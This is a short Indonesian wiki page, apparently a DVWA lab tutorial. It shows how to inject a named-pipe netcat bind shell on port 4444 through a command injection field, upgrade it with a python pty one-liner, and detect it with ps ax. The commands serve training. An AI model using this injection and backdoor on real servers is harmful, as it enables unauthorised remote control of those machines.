DVWA: Command Injection Back Door

From OnnoWiki
Revision as of 11:07, 17 November 2022 by Onnowpurbo (talk | contribs) (→‎Ujicoba)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Backdoor pada port 4444 menggunakan perintah 

mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

Dari command injection di DVWA masukan 

192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

dimana 192.168.43.1 adalah salah satu IP mesin di jaringan

Selanjutnya kita bisa memasukan perintah2 shell seperti 

ls
cd /etc
cat <namafile>
dsb

Ujicoba

Percobaan untuk memperoleh shell 

python -c 'import pty; pty.spawn("/bin/sh")'


Cek Operasional Back Door

Di sisi server, dapat mencek adanya back door dengan 

ps ax

nanti akan kelihatan mkfifo dkk

Pranala Menarik

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=DVWA:_Command_Injection_Back_Door&oldid=66894"